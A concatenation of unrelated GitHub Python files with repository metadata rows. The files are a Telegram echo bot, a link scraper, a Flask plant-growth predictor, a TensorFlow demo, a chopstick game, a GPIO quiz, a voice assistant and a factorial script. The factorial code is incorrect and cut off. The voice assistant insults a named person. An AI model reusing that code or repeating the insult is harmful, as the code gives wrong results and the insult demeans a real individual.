content_type, chat_type, chat_id = telepot.glance(msg)
print(content_type, chat_type, chat_id)
if content_type == 'text':
bot.sendMessage(chat_id,"You said '{}'".format(msg['text']))
bot.message_loop(handle)
| UTF-8 | Python | false | false | 376 | py | 2 | PRAC1.py | 1 | 0.675532 | 0.635638 | 0 | 15 | 24.066667 | 68 |
luhralive/python | 3,547,643,033,952 | b604047d1944245783b011252f385742a3596147 | 45de13a618813455a3ea1e65c5dd31066b311cd7 | /kamen/0009/0009.py | cf961eec554b7991f7a4ff0b3dce963bf261f955 | []
| permissive | https://github.com/luhralive/python | bbee0a3e7d0ac9845db484595362bba41923c2a4 | b74bdc4c7bc8e75aee9530c27d621a773a71ac67 | refs/heads/master | 2020-05-19T12:48:17.144882 | 2019-05-05T11:53:46 | 2019-05-05T11:53:46 | 185,023,995 | 1 | 0 | MIT | true | 2019-05-05T11:45:42 | 2019-05-05T11:45:41 | 2019-05-05T05:39:52 | 2019-03-26T14:19:59 | 110,745 | 0 | 0 | 0 | null | false | false | from bs4 import BeautifulSoup
from urllib import urlopen
r = urlopen('http://sports.sina.com.cn/nba/2015-04-23/00007584374.shtml').read()
soup = BeautifulSoup(r)
#there is javasciript things to be cleaned.
s = soup.find_all("a")
for link in s:
try:
print link["href"]
except KeyError:
pass
| UTF-8 | Python | false | false | 316 | py | 832 | 0009.py | 633 | 0.686709 | 0.623418 | 0 | 12 | 25.25 | 80 |
lalodsi/TallerDjangoWithAxel | 10,264,971,842,609 | 0994e3372eab720861258238a25ddccc262dc3f8 | 55ea05a4e36bac33b48f08cfb664a05277927235 | /control_escolar/matricula/apps.py | f4878490cd018a2628e43c6957d0961e1695126c | []
| no_license | https://github.com/lalodsi/TallerDjangoWithAxel | b74832a472f911f1cb28c1d7e9c3bfc5cd7af204 | b8c8acc6f2aba1fa173e3d5ecbc554adf0e8cdb3 | refs/heads/master | 2023-07-06T21:54:32.465990 | 2021-08-14T03:38:31 | 2021-08-14T03:38:31 | 317,130,256 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """" En este modulo se encuentran todas la aplicaciones"""
from django.apps import AppConfig
class MatriculaConfig(AppConfig):
name = 'matricula'
verbose_name = 'Matriculas'
| UTF-8 | Python | false | false | 186 | py | 10 | apps.py | 7 | 0.725806 | 0.725806 | 0 | 9 | 19.666667 | 58 |
supersteph/pytorch-openai-transformer-lm | 13,022,340,884,859 | 833540e438807ec9c3368ba36e300297cf77bd0b | 4f28d7446cfe8c484e440b3d826a9a98c75a4b45 | /test.py | 3de4b214a27d5cf553c8dc27f5f476cd5500652c | [
"MIT"
]
| permissive | https://github.com/supersteph/pytorch-openai-transformer-lm | b70aefd3bac72034f2e2bf38943b98989e09d574 | a31e739b1d3d3a2de5c8e05d54e7540a9842ed4a | refs/heads/master | 2020-07-20T14:11:16.594820 | 2019-12-20T08:04:52 | 2019-12-20T08:04:52 | 206,656,464 | 0 | 0 | MIT | true | 2019-09-05T20:59:53 | 2019-09-05T20:59:53 | 2019-09-05T09:12:05 | 2019-02-07T21:40:39 | 273 | 0 | 0 | 0 | null | false | false | import datetime as dt
start = dt.datetime.now()
t = dt.datetime.now()
i = 0
while True:
delta=dt.datetime.now()-t
if delta.seconds >= 60:
i+=1
print(i)
t = dt.datetime.now() | UTF-8 | Python | false | false | 181 | py | 6 | test.py | 6 | 0.651934 | 0.629834 | 0 | 10 | 17.2 | 26 |
fachrytarigan/plant-area-prediction-using-flask-and-linear-regression | 283,467,849,813 | e2463f684a39c8b5ae69cbe34766ab88b799cf25 | c3e79c2d2d22129290764b0bb05f7eccec233bfe | /app.py | 80e9796cc63afdebd4a59431741bf452c9154b51 | []
| no_license | https://github.com/fachrytarigan/plant-area-prediction-using-flask-and-linear-regression | 72c8699c45b2dd121fadc62e923a49a2161917e4 | 775252bb9c7afe37020573c4327b9335568d2434 | refs/heads/master | 2023-03-20T00:16:11.573545 | 2021-03-22T14:15:06 | 2021-03-22T14:15:06 | 333,450,432 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Flask, redirect, url_for, render_template, request, flash
from werkzeug.utils import secure_filename
from werkzeug.datastructures import FileStorage
from sklearn import linear_model
import pandas as pd
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.figure import Figure
from sklearn.linear_model import LinearRegression
import pickle
import base64
from io import BytesIO
import matplotlib.pyplot as plt
app = Flask(__name__)
app.secret_key = 'random string'
model_width_filename = 'width_predict_model.ml'
model_height_filename = 'height_predict_model.ml'
model_non_zero_filename = 'non_zero_predict_model.ml'
model_width = pickle.load(open(model_width_filename, 'rb'))
model_height = pickle.load(open(model_height_filename, 'rb'))
model_non_zero = pickle.load(open(model_non_zero_filename, 'rb'))
@app.route('/', methods=['POST', 'GET'])
def index():
return render_template("index.html")
@app.route('/predict', methods=['POST'])
def predict():
if request.method == 'POST':
suhu_air = float(request.form['suhu_air'])
tds = float(request.form['tds'])
features = [[suhu_air, tds]]
width_predict = model_width.predict(features)
height_predict = model_height.predict(features)
non_zero_predict = model_non_zero.predict(features)
import math
output_width = math.trunc(width_predict[0])
output_height = math.trunc(height_predict[0])
output_non_zero = math.trunc(non_zero_predict[0])
from datetime import datetime
namafile = datetime.now().strftime("%Y%m%d-%H%M%S")
width_predict_image = visual_width(suhu_air, tds, namafile)
height_predict_image = visual_height(suhu_air, tds, namafile)
non_zero_predict_image = visual_nonzero(suhu_air, tds, namafile)
context = {
"suhu_air": suhu_air,
"tds": tds,
"width_predict_image" : width_predict_image,
"height_predict_image" : height_predict_image,
"non_zero_predict_image": non_zero_predict_image
}
return render_template("predict.html", context=context)
else:
url_for('index')
def visual_width(suhu_air, tds, namafile):
df = pd.read_csv('data_foto_tanaman.csv')
df = df.set_index('image_name')
X = df[['suhu_air', 'tds']].values.reshape(-1, 2)
Y_WIDTH = df['width']
######################## Prepare model data point for visualization ###############################
x = X[:, 0] #Suhu Air
y = X[:, 1] #TDS
z = Y_WIDTH #Width
x_pred_biru = np.linspace(x.min(), x.max(), len(x)) # range of suhu air
y_pred_biru = np.linspace(y.min(), y.max(), len(y)) # range of tds
suhu_air = float(suhu_air)
tds = float(tds)
x_pred_merah = [suhu_air]
y_pred_merah = [tds]
xx_pred_merah, yy_pred_merah = np.meshgrid([suhu_air], [tds])
xx_pred_biru,yy_pred_biru = np.meshgrid(x_pred_biru, y_pred_biru)
model_viz_biru = np.array([xx_pred_biru.flatten(), yy_pred_biru.flatten()]).T
model_viz_merah = np.array([x_pred_merah, y_pred_merah]).T #Model Predicted
################################################ Train #############################################
ols_width_biru = LinearRegression()
model_width_biru = ols_width_biru.fit(X, Y_WIDTH)
predicted_width_biru = model_width_biru.predict(model_viz_biru)
ols_width_merah = LinearRegression()
model_width_merah = ols_width_merah.fit(X, Y_WIDTH)
predicted_width_merah = model_width_merah.predict(model_viz_merah)
r2 = model_width_merah.score(X, Y_WIDTH)
############################################## Plot ################################################
plt.style.use('seaborn-whitegrid')
fig = Figure(figsize=(14, 4))
ax1 = fig.add_subplot(131, projection='3d')
ax2 = fig.add_subplot(132, projection='3d')
ax3 = fig.add_subplot(133, projection='3d')
axes = [ax1, ax2, ax3]
for ax in axes:
#ax.plot(x, y, z, color='#70b3f0', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.scatter(xx_pred_biru.flatten(), yy_pred_biru.flatten(), predicted_width_biru, facecolor=(0,0,0,0), s=20, edgecolor='#fffdd5', alpha=0.2)
ax.scatter(x_pred_merah, y_pred_merah, predicted_width_merah, facecolor='#ff0000', s=20, edgecolor='#ff0000', marker='o', alpha=1)
ax.plot(x, y, z, color='#2c6fff', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.set_xlabel('Suhu Air (°C)', fontsize=12)
ax.set_ylabel('TDS (ppm)', fontsize=12)
ax.set_zlabel('Leaf Area', fontsize=12)
ax.locator_params(nbins=4, axis='x')
ax.locator_params(nbins=5, axis='x')
# ax1.text2D(0.2, 0.32, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax1.transAxes, color='grey', alpha=0.5)
# ax2.text2D(0.3, 0.42, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax2.transAxes, color='grey', alpha=0.5)
# ax3.text2D(0.85, 0.85, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax3.transAxes, color='grey', alpha=0.5)
ax1.view_init(elev=28, azim=120)
ax2.view_init(elev=4, azim=114)
ax3.view_init(elev=60, azim=165)
#ax1.view_init(elev=27, azim=112)
#ax2.view_init(elev=20, azim=-51)
#ax3.view_init(elev=60, azim=165)
fig.suptitle('Width Prediction = %f Pixels' % predicted_width_merah[0], fontsize=20)
#fig.suptitle('$R^2 = %f$' % r2, fontsize=20)
image_path = 'static/images/' + namafile + '-width.png'
width_image = fig.savefig(image_path)
fig.tight_layout()
return image_path
def visual_height(suhu_air, tds, namafile):
df = pd.read_csv('data_foto_tanaman.csv')
df = df.set_index('image_name')
X = df[['suhu_air', 'tds']].values.reshape(-1,2)
Y_HEIGHT = df['height']
######################## Prepare model data point for visualization ###############################
x = X[:, 0] #Suhu Air
y = X[:, 1] #TDS
z = Y_HEIGHT #Width
x_pred_biru = np.linspace(x.min(), x.max(), len(x)) # range of suhu air
y_pred_biru = np.linspace(y.min(), y.max(), len(y)) # range of tds
suhu_air = float(suhu_air)
tds = float(tds)
x_pred_merah = [suhu_air]
y_pred_merah = [tds]
xx_pred_merah, yy_pred_merah = np.meshgrid([suhu_air], [tds])
xx_pred_biru,yy_pred_biru = np.meshgrid(x_pred_biru, y_pred_biru)
model_viz_biru = np.array([xx_pred_biru.flatten(), yy_pred_biru.flatten()]).T
model_viz_merah = np.array([x_pred_merah, y_pred_merah]).T #Model Predicted
################################################ Train #############################################
ols_height_biru = LinearRegression()
model_height_biru = ols_height_biru.fit(X, Y_HEIGHT)
predicted_height_biru = model_height_biru.predict(model_viz_biru)
ols_height_merah = LinearRegression()
model_height_merah = ols_height_merah.fit(X, Y_HEIGHT)
predicted_height_merah = model_height_merah.predict(model_viz_merah)
r2 = model_height_merah.score(X, Y_HEIGHT)
############################################## Plot ################################################
plt.style.use('seaborn-whitegrid')
fig = Figure(figsize=(14, 4))
ax1 = fig.add_subplot(131, projection='3d')
ax2 = fig.add_subplot(132, projection='3d')
ax3 = fig.add_subplot(133, projection='3d')
axes = [ax1, ax2, ax3]
for ax in axes:
#ax.plot(x, y, z, color='#70b3f0', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.scatter(xx_pred_biru.flatten(), yy_pred_biru.flatten(), predicted_height_biru, facecolor=(0,0,0,0), s=20, edgecolor='#fffdd5', alpha=0.2)
ax.scatter(x_pred_merah, y_pred_merah, predicted_height_merah, facecolor='#ff0000', s=20, edgecolor='#ff0000', marker='o', alpha=1)
ax.plot(x, y, z, color='#2c6fff', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.set_xlabel('Suhu Air (°C)', fontsize=12)
ax.set_ylabel('TDS (ppm)', fontsize=12)
ax.set_zlabel('Leaf Area', fontsize=12)
ax.locator_params(nbins=4, axis='x')
ax.locator_params(nbins=5, axis='x')
# ax1.text2D(0.2, 0.32, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax1.transAxes, color='grey', alpha=0.5)
# ax2.text2D(0.3, 0.42, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax2.transAxes, color='grey', alpha=0.5)
# ax3.text2D(0.85, 0.85, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax3.transAxes, color='grey', alpha=0.5)
ax1.view_init(elev=28, azim=120)
ax2.view_init(elev=4, azim=114)
ax3.view_init(elev=60, azim=165)
#ax1.view_init(elev=27, azim=112)
#ax2.view_init(elev=20, azim=-51)
#ax3.view_init(elev=60, azim=165)
fig.suptitle('Height Prediction = %f Pixels' % predicted_height_merah[0], fontsize=20)
#fig.suptitle('$R^2 = %f$' % r2, fontsize=20)
image_path = 'static/images/' + namafile + '-height.png'
width_image = fig.savefig(image_path)
fig.tight_layout()
return image_path
def visual_nonzero(suhu_air, tds, namafile):
df = pd.read_csv('data_foto_tanaman.csv')
df = df.set_index('image_name')
X = df[['suhu_air', 'tds']].values.reshape(-1,2)
Y_NON_ZERO = df['non_zero']
######################## Prepare model data point for visualization ###############################
x = X[:, 0] #Suhu Air
y = X[:, 1] #TDS
z = Y_NON_ZERO #Width
x_pred_biru = np.linspace(x.min(), x.max(), len(x)) # range of suhu air
y_pred_biru = np.linspace(y.min(), y.max(), len(y)) # range of tds
suhu_air = float(suhu_air)
tds = float(tds)
x_pred_merah = [suhu_air]
y_pred_merah = [tds]
xx_pred_merah, yy_pred_merah = np.meshgrid([suhu_air], [tds])
xx_pred_biru,yy_pred_biru = np.meshgrid(x_pred_biru, y_pred_biru)
model_viz_biru = np.array([xx_pred_biru.flatten(), yy_pred_biru.flatten()]).T
model_viz_merah = np.array([x_pred_merah, y_pred_merah]).T #Model Predicted
################################################ Train #############################################
ols_non_zero_biru = LinearRegression()
model_non_zero_biru = ols_non_zero_biru.fit(X, Y_NON_ZERO)
predicted_non_zero_biru = model_non_zero_biru.predict(model_viz_biru)
ols_non_zero_merah = LinearRegression()
model_non_zero_merah = ols_non_zero_merah.fit(X, Y_NON_ZERO)
predicted_non_zero_merah = model_non_zero_merah.predict(model_viz_merah)
r2 = model_non_zero_merah.score(X, Y_NON_ZERO)
############################################## Plot ################################################
plt.style.use('seaborn-whitegrid')
fig = Figure(figsize=(14, 4))
ax1 = fig.add_subplot(131, projection='3d')
ax2 = fig.add_subplot(132, projection='3d')
ax3 = fig.add_subplot(133, projection='3d')
axes = [ax1, ax2, ax3]
for ax in axes:
#ax.plot(x, y, z, color='#70b3f0', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.scatter(xx_pred_biru.flatten(), yy_pred_biru.flatten(), predicted_non_zero_biru, facecolor=(0,0,0,0), s=20, edgecolor='#fffdd5', alpha=0.2)
ax.scatter(x_pred_merah, y_pred_merah, predicted_non_zero_merah, facecolor='#ff0000', s=20, edgecolor='#ff0000', marker='o', alpha=1)
ax.plot(x, y, z, color='#2c6fff', zorder=15, linestyle='none', marker='o', alpha=0.5)
ax.set_xlabel('Suhu Air (°C)', fontsize=12)
ax.set_ylabel('TDS (ppm)', fontsize=12)
ax.set_zlabel('Leaf Area', fontsize=12)
ax.locator_params(nbins=4, axis='x')
ax.locator_params(nbins=5, axis='x')
# ax1.text2D(0.2, 0.32, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax1.transAxes, color='grey', alpha=0.5)
# ax2.text2D(0.3, 0.42, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax2.transAxes, color='grey', alpha=0.5)
# ax3.text2D(0.85, 0.85, 'Pertumbuhan Aquaponik', fontsize=13, ha='center', va='center',
# transform=ax3.transAxes, color='grey', alpha=0.5)
ax1.view_init(elev=28, azim=120)
ax2.view_init(elev=4, azim=114)
ax3.view_init(elev=60, azim=165)
#ax1.view_init(elev=27, azim=112)
#ax2.view_init(elev=20, azim=-51)
#ax3.view_init(elev=60, azim=165)
fig.suptitle('Leaf Area Prediction = %f' % predicted_non_zero_merah[0], fontsize=20)
#fig.suptitle('$R^2 = %f$' % r2, fontsize=20)
image_path = 'static/images/' + namafile + '-non-zero.png'
width_image = fig.savefig(image_path)
fig.tight_layout()
return image_path
if __name__ == '__main__':
app.run(debug=True)
| UTF-8 | Python | false | false | 12,939 | py | 7 | app.py | 1 | 0.591914 | 0.557514 | 0 | 322 | 39.173913 | 150 |
pandix73/Python_learning | 4,406,636,476,059 | 4ce55c7044eb3cd19721c12de2b373da46dc0289 | c86f670a3dd715bf522ef899ca826b8a074e1c6b | /tensorflow/test2.py | 9b7d113af68a3c1ccb22d2f1613beaa68ae36bb1 | []
| no_license | https://github.com/pandix73/Python_learning | ac4b8114aab765a92821588bf3c282e965056183 | d4f75f347a13f777da62fdc158a3ef8434e9fdce | refs/heads/master | 2021-01-17T14:57:10.716009 | 2017-08-03T02:12:05 | 2017-08-03T02:12:05 | 48,616,296 | 6 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import numpy as np
import tensorflow as tf
x = np.random.rand(100).astype(np.float32)
y = 0.5*x*x + 1
weight = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
weight2 = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
weight3 = tf.Variable(tf.random_uniform([1], -1.0, 1.0))
biase = tf.Variable(tf.zeros([1]))
biase2 = tf.Variable(tf.zeros([1]))
linear_y = weight*x + biase
quadratic_y = weight2*x*x + weight3*x + biase2
linear_loss = tf.reduce_mean(tf.square(y-linear_y))
quadratic_loss = tf.reduce_mean(tf.square(y-quadratic_y))
optimizer = tf.train.GradientDescentOptimizer(0.5)
linear_train = optimizer.minimize(linear_loss)
quadratic_train = optimizer.minimize(quadratic_loss)
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
for step in range(201):
sess.run(linear_train)
sess.run(quadratic_train)
if step%20 == 0:
print(step, 'linear', sess.run(linear_loss))
print(step, 'quadratic', sess.run(quadratic_loss))
| UTF-8 | Python | false | false | 1,024 | py | 30 | test2.py | 28 | 0.695313 | 0.65625 | 0 | 32 | 31 | 58 |
ppaka/pystudy | 3,564,822,858,369 | 0eb9fca2c1fc70b8c9b003daddb523048293d78a | 3bf74549c7ddb798ace9fa62bfb47f0fff0f1a07 | /game homework/chopstickGame/main.py | 6eff1977aeec3b9c16b168086df19d3cae40317a | []
| no_license | https://github.com/ppaka/pystudy | b1a5e5bc50a84a87a77ae205adc8cd5d242ea72b | 7543b18a9d255dd5e4676927450c075d703be8cd | refs/heads/main | 2023-06-09T03:30:25.199582 | 2021-06-22T05:02:29 | 2021-06-22T05:02:29 | 348,222,051 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | player_cs_left = 1
player_cs_right = 1
player_second_cs_left = 1
player_second_cs_right = 1
player_turn = 1
gameOver = False
who_win = ""
def game():
global gameOver, who_win
if player_cs_left == 0 and player_cs_right == 0:
gameOver = True
who_win = "player2"
elif player_second_cs_left == 0 and player_second_cs_right == 0:
gameOver = True
who_win = "player1"
def select_what_to_do():
the_select = str(input("[공격, 나누기 중에 하나를 골라주세요]\n"))
if the_select == "공격":
if player_turn == 1:
get_first_player_input()
elif player_turn == 2:
get_second_player_input()
elif the_select == "나누기":
if player_turn == 1:
separate("player1")
elif player_turn == 2:
separate("player2")
def get_first_player_input():
hand = str(input("[플레이어1, 당신의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if hand == "왼손":
atk_hand = str(input("[플레이어1, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("left", "left", "player1")
elif atk_hand == "오른손":
add_cs("left", "right", "player1")
elif hand == "오른손":
atk_hand = str(input("[플레이어1, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("right", "left", "player1")
elif atk_hand == "오른손":
add_cs("right", "right", "player1")
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
get_first_player_input()
def get_second_player_input():
hand = str(input("[플레이어2, 당신의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if hand == "왼손":
atk_hand = str(input("[플레이어2, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("left", "left", "player2")
elif atk_hand == "오른손":
add_cs("left", "right", "player2")
elif hand == "오른손":
atk_hand = str(input("[플레이어2, 이제, 공격할 상대의 왼손, 오른손 중에 하나를 입력해주세요]\n"))
if atk_hand == "왼손":
add_cs("right", "left", "player2")
elif atk_hand == "오른손":
add_cs("right", "right", "player2")
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
get_first_player_input()
def add_cs(selected_hand, target_hand, now_turn):
global player_second_cs_left, player_cs_left, player_second_cs_right, player_cs_right, player_turn
if selected_hand == "left" and target_hand == "left":
if now_turn == "player1":
player_second_cs_left += player_cs_left
elif now_turn == "player2":
player_cs_left += player_second_cs_left
elif selected_hand == "left" and target_hand == "right":
if now_turn == "player1":
player_second_cs_right += player_cs_left
elif now_turn == "player2":
player_cs_right += player_second_cs_left
elif selected_hand == "right" and target_hand == "left":
if now_turn == "player1":
player_second_cs_left += player_cs_right
elif now_turn == "player2":
player_cs_left += player_second_cs_right
elif selected_hand == "right" and target_hand == "right":
if now_turn == "player1":
player_second_cs_right += player_cs_right
elif now_turn == "player2":
player_cs_right += player_second_cs_right
if player_cs_left >= 5:
player_cs_left = 0
if player_cs_right >= 5:
player_cs_right = 0
if player_second_cs_left >= 5:
player_second_cs_left = 0
if player_second_cs_right >= 5:
player_second_cs_right = 0
print("플레이어1 손가락:", player_cs_left, player_cs_right, "플레이어2 손가락:", player_second_cs_left, player_second_cs_right)
if now_turn == "player1":
player_turn = 2
elif now_turn == "player2":
player_turn = 1
game()
def separate(now_turn):
global player_cs_right, player_cs_left, player_second_cs_left, player_second_cs_right, player_turn
selected = input("[나눠질 결과를 적어주세요(각 손은 ,로 구분)]\n")
splited = selected.split(',')
both = int(splited[0]) + int(splited[1])
if now_turn == "player1":
if both == (player_cs_left + player_cs_right):
player_cs_left = splited[0]
player_cs_right = splited[1]
print("플레이어1 손가락:", player_cs_left, player_cs_right, "플레이어2 손가락:", player_second_cs_left,
player_second_cs_right)
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
separate("player1")
elif now_turn == "player2":
if both == (player_second_cs_left + player_second_cs_right):
player_second_cs_left = splited[0]
player_second_cs_right = splited[1]
print("플레이어1 손가락:", player_cs_left, player_cs_right, "플레이어2 손가락:", player_second_cs_left,
player_second_cs_right)
else:
print("[올바른 입력이 아닙니다. 다시 입력해주세요]\n")
separate("player2")
if now_turn == "player1":
player_turn = 2
elif now_turn == "player2":
player_turn = 1
def start():
while True:
select_what_to_do()
if gameOver:
print("")
break
start()
| UTF-8 | Python | false | false | 5,814 | py | 41 | main.py | 40 | 0.550039 | 0.536215 | 0 | 156 | 31.923077 | 117 |
brainspork/RaspberryPI-GPIO-Learning | 14,130,442,435,996 | 00d7dbfcda8069c4e56ec782715482e34c961186 | c18a9164b32a1309f10820643e7d26df2df5dd40 | /gpio/twoButton.py | b8d55ca4a58d891c96bfc5571893acb82115d04f | []
| no_license | https://github.com/brainspork/RaspberryPI-GPIO-Learning | 03218b3f595a3b3d849bae938338e1e23bd68b1c | 3b26bbcaea394af6ba116eb4ea4baf33eb4e650c | refs/heads/master | 2023-07-09T17:27:11.761028 | 2021-08-11T19:14:01 | 2021-08-11T19:14:01 | 395,093,284 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import RPi.GPIO as GPIO
import time
# Sets up for pin numbers (alt GPIO.BCM)
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
# True, False
in_list = [36, 32]
# Green, Red
out_list = [22, 40]
GPIO.setup(in_list, GPIO.IN)
GPIO.setup(out_list, GPIO.OUT)
questions = [
["Is 3 > 4?", False],
["Is the sky blue?", True],
["You can convert a int to a string in python with string concatination", False]
]
correct_count = 0
def validate_input(answer, actual):
correct = answer == actual
c = 0
if correct:
GPIO.output(22, True)
c = 1
else:
GPIO.output(40, True)
return c
for q in questions:
answered = False
print(q[0])
while answered == False:
true_in = GPIO.input(36)
false_in = GPIO.input(32)
if true_in == False:
print('Pressed True')
correct_count += validate_input(True, q[1])
answered = True
while true_in == False:
true_in = GPIO.input(36)
if false_in == False:
print('Pressed False')
correct_count += validate_input(False, q[1])
answered = True
while false_in == False:
false_in = GPIO.input(32)
if answered == True:
time.sleep(1)
GPIO.output(22, False)
GPIO.output(40, False)
print("Quiz complete, score " + str(correct_count) + "/" + str(len(questions)))
GPIO.cleanup(in_list + out_list) | UTF-8 | Python | false | false | 1,484 | py | 7 | twoButton.py | 5 | 0.558625 | 0.536388 | 0 | 66 | 21.5 | 84 |
masabumair023/Virtual-Assistant-Python | 953,482,745,681 | b6d560f1e201af9bdfa0f78e058b6908891f6782 | 21b3bf05c1cba2a6ad017bcb1cdd770c7ae7c129 | /Togo (Virtual Assistant).py | 72fd0d3c17651258d354695d3efd77309cb22f4c | []
| no_license | https://github.com/masabumair023/Virtual-Assistant-Python | f11b8a0a55cc72ad5bebbfc99d7df834feb9d21d | 3f14af036ce3a428ab7e6781f4fc66a35be0a961 | refs/heads/master | 2023-07-02T11:39:35.870596 | 2021-08-08T11:00:25 | 2021-08-08T11:00:25 | 393,933,906 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pyttsx3 # text to speech converter, offline module
import datetime # to get the time
import wikipedia # to get something from wikipedia
import webbrowser # to work with browsers
import os # to deal with files and directories
import random # to generate random numbers
import speech_recognition as sr # it will understand and interpret the commands given by the user
import smtplib #used to send emails using gmail account
engine = pyttsx3.init('sapi5') # initialize puttsx3 with sapi(windows in biult speech recognition API)
voices = engine.getProperty('voices') # used to get the in built windows voices
engine.setProperty('voice',voices[1].id) # set the desired voice
def speak(audio):
"""
This function converts the text into audio
"""
engine.say(audio)
engine.runAndWait()
def greetings():
"""
This function greets the user according to time
"""
hours = int(datetime.datetime.now().hour) # take the current time in hours
if hours>0 and hours<12:
speak("Good Morning Masab")
elif hours>=12 and hours<18:
speak("Good Afternoon Masab")
else:
speak("Good Evening Masab")
speak("My name is TOGO and i am your virtual assistant. How may i help you sir?")
def takeCommand():
"""
This function takes microphone input form the user and returns a string output
"""
r = sr.Recognizer() # Recognizer() will recognize the input
with sr.Microphone() as source:
print("Listening....")
r.pause_threshold = 1 # ctrl+click
audio = r.listen(source)
try:
#Recognizing the audio that is said by the user
print("Recognizing.....")
query = r.recognize_google(audio,language="en-us")
print(f"User said: {query}\n")
except Exception as e:
print(e)
speak("Please say that again.....")
return "None"
return query
def sendEmail(to,content):
"""
This function send mails using gmail account
"""
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('your email id','your password') # enter your gmail and password here
server.sendmail('your email id',to,content)
server.close()
if __name__ == "__main__":
greetings()
while True:
query = takeCommand().lower()
# Logic to execute tasks based on query
if 'wikipedia' in query:
speak("Searching wikipedia...")
query = query.replace("wikipedia","")
results = wikipedia.summary(query, sentences=1)
speak("According to wikipedia")
print(results)
speak(results)
elif 'open youtube' in query:
webbrowser.open("youtube.com")
elif 'open google' in query:
webbrowser.open("google.com")
elif 'open stackoverflow' in query:
webbrowser.open("stackoverflow.com")
elif 'play music' in query:
music_dir = "E:\\SONGS"
songs = os.listdir(music_dir)
random_song = random.randint(0,len(songs))
os.startfile(os.path.join(music_dir,songs[random_song]))
elif 'the time' in query:
time = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"The time is {time}")
elif 'open code' in query:
vscodePath = "C:\\Users\\LENOVO\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(vscodePath)
#You'll need to allow less secure apps in gmail to send the emails
elif 'send email' in query:
try:
speak("Please say what do you want to send")
content = takeCommand()
to = "email@gmail.com" # Type here the email id whom you want to send the email
sendEmail(to,content)
speak("Email has been sent!")
except Exception as e:
print(e)
speak("Sorry sir! I am not able to send your email at the moment")
elif 'how are you' in query:
speak("I am doing great. it's a bit hot here. What about you?")
elif 'fine' and 'good' in query:
speak("Good to know that")
elif 'thank you' in query:
speak("Thank you Masab! Have a great day")
break
elif 'dick head' in query:
speak("Ohhh! That is Sajjad Hameed")
elif 'quit' in query:
exit()
| UTF-8 | Python | false | false | 4,512 | py | 3 | Togo (Virtual Assistant).py | 2 | 0.601507 | 0.597518 | 0 | 118 | 37.169492 | 102 |
AntoineOrsoni/pyats-check-os | 9,826,885,193,664 | eec2f3ffbc28077fb36a06531e353ad65d69aca4 | 994c6471b59401647702f0dbdd7e245673c2f171 | /toolbox/pyats_diff.py | 99bcf1a9a93df5f88b252f5ad98fd6d58b5f5b47 | [
"MIT"
]
| permissive | https://github.com/AntoineOrsoni/pyats-check-os | 66ca459db5f16303435916a1d3a44428b709f945 | 3b701c49538c9669b91b50c9fce7a04aa3088044 | refs/heads/master | 2023-03-05T02:49:03.726602 | 2021-02-18T09:06:33 | 2021-02-18T09:06:33 | 300,287,444 | 7 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | from genie.utils.diff import Diff
import toolbox.database as db
import json
def compare_output_before_after(hostname, test_name):
result_before = json.loads(db.get_output_test(hostname, test_name, "before"))
result_after = json.loads(db.get_output_test(hostname, test_name, "after"))
dd = Diff(result_before, result_after, mode = 'modified')
dd.findDiff()
print(dd) | UTF-8 | Python | false | false | 389 | py | 19 | pyats_diff.py | 7 | 0.714653 | 0.714653 | 0 | 13 | 29 | 81 |
heba-ali2030/examples | 3,693,671,922,843 | 80c2c7044a0e8df3bb8d93dfc43b6f348f44dceb | 415023588927f3bd224c30ffb5059a4196d5cbf4 | /factorial_num.py | 493da8f50a35691b1c87f59c84fa61ef847ebc34 | []
| no_license | https://github.com/heba-ali2030/examples | 77ace9d857174d575c21a1361c198aef0f9e9643 | d47c314d110bc40baf5987dae887bc4ed7a05287 | refs/heads/main | 2023-03-18T18:16:02.982269 | 2021-03-11T20:52:51 | 2021-03-11T20:52:51 | 346,082,841 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #Python Program to Find the Factorial of a Number
num= int(input('choose a number to find its factorials: '))
if num== 0:
print('factorial number is one')
if num >= 1:
for i in range(1, num):
result = i*i
print(result)
print('factorials for', num)
if num < 1:
